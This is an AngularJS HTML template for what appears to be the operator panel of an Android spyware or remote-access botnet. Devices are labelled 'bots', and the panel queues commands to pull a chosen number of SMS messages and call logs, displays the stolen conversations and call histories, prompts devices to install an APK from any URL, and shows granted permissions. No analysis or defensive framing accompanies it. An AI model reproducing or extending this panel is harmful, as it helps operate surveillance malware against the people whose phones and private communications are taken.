<h1>
  <span ng-show="!bot.updated">{{bot.device}}</span>
  <span class="text-success" ng-show="bot.status && bot.updated">{{bot.device}} (online)</span>
  <span class="text-danger" ng-show="!bot.status && bot.updated">{{bot.device}} (offline)</span>
</h1>
<p>Last seen {{bot.updated | amCalendar:referenceTime:formats}}</p>
<!-- <p class="text-success" ng-show="bot.status">ONLINE</p>
<p class="text-danger" ng-show="!bot.status">OFFLINE</p> -->
<uib-tabset active="active">
  <uib-tab index="0" heading="SMS">
    <form name="smsForm">
      <div class="form-group" ng-class="">
        <label>Number of SMS</label>
        <input class="form-control" type="number" name="number" ng-model="numbersms" required>
      </div>
      <div class="form-group">
        <button type="submit" ng-disabled="smsForm.$invalid" class="btn btn-primary" ng-click="addCommand('getsms', numbersms)">Get SMS</button>
      </div>
    </form>
    <hr>
    <strong ng-show="!hasMessages">No messages to show.</strong>
    <div ng-show="hasMessages">
      SMS History
      <a class="btn btn-danger btn-sm" ng-click="clearSMS()">Clear History</a>
      <hr>
      <uib-accordion close-others="true">
        <div ng-repeat="(thread, messages) in messageThreads" uib-accordion-group class="panel-default" heading="{{getSmsHeaderTitle(messages)}}">
          <div class="sms-view">
            <ul class="list-group">
              <li ng-class="msg.type*1 === 1 ? 'text-info' : 'text-success'" class="list-group-item" ng-repeat="msg in messages">
                {{msg.type*1 === 1 ? ((msg.name ? msg.name + ' ' : '') + msg.phone) : 'Me'}}:
                <br> <strong>{{msg.message}}</strong>
                <br> {{msg.date | amCalendar:referenceTime:formats}}
              </li>
            </ul>
          </div>
        </div>
      </uib-accordion>
    </div>
  </uib-tab>
  <uib-tab index="1" heading="Call Logs">
    <form name="callLogsForm">
      <div class="form-group" ng-class="">
        <label>Number of call logs</label>
        <input class="form-control" type="number" name="number" ng-model="num_call_logs" required>
      </div>
      <div class="form-group">
        <button ng-disabled="callLogsForm.$invalid" class="btn btn-primary" ng-click="addCommand('getcallhistory', num_call_logs)">Get Call History</button>
      </div>
    </form>
    <hr>
    <b ng-show="callLogs.length === 0">No call history to show.</b>
    <div class="panel panel-default" ng-show="callLogs.length > 0">
      <div class="panel-heading">
        Call Logs
        <a class="btn btn-danger btn-sm" ng-click="clearCallLogs()">Clear History</a>
      </div>
      <div class="panel-body">
        <div class="call-logs-view">
          <div class="list-group">
            <div class="list-group-item" ng-repeat="log in callLogs | orderBy: 'date'" ng-class="callLogClass(log)">
              <span ng-if="log.type*1===1">(Incoming)</span>
              <span ng-if="log.type*1===2">(Outgoing)</span>
              <span ng-if="log.type*1===3">(Missed)</span> {{log.name}} {{log.phone}}
              </br>
              {{log.date | amCalendar:referenceTime:formats}}</br>
              <!-- {{log.date}}</br> -->
              duration {{log.duration*1000|duration:'hh:mm:ss'}}</br>
            </div>
          </div>
        </div>
      </div>
    </div>
  </uib-tab>
  <uib-tab index="2" heading="Update APK">
    <form name="updateForm">
      <div class="form-group" ng-class="">
        <label>URL of the new apk</label>
        <input class="form-control" type="text" name="url" ng-model="update_url" required>
      </div>
      <div class="form-group">
        <button ng-disabled="updateForm.$invalid" class="btn btn-primary" ng-click="addCommand('promptupdate', update_url)">Prompt Update</button>
      </div>
    </form>
  </uib-tab>
  <uib-tab index="3" heading="Permissions">
    <table class="table">
      <thead>
        <tr>
          <th>Permission</th>
          <th>Status</th>
        </tr>
      </thead>
      <tbody>
        <tr ng-repeat="perm in permissions">
          <td>{{perm.permission}}</td>
          <td>
            <span class="text-success" ng-if="perm.granted">Granted</span>
            <span class="text-danger" ng-if="!perm.granted">Denied</span>
          </td>
        </tr>
      </tbody>
    </table>
    <b ng-show="permissions.length === 0">No info to show</b>
  </uib-tab>
  <uib-tab index="4" heading="Pending Commands">
    <div class="list-group">
      <div class="list-group-item" ng-repeat="cmd in pendingCommands">
        {{cmd.command}}
        <a class="btn btn-danger btn-sm" ng-click="deleteCommand(cmd.id)">&times;</a>
      </div>
      <p ng-show="pendingCommands.length === 0">No pending commands</p>
    </div>
  </uib-tab>
  <uib-tab index="5" heading="Settings">
    <a ng-click="removeDevice(bot)" class="btn btn-danger">Remove Device</a>
  </uib-tab>
</uib-tabset>
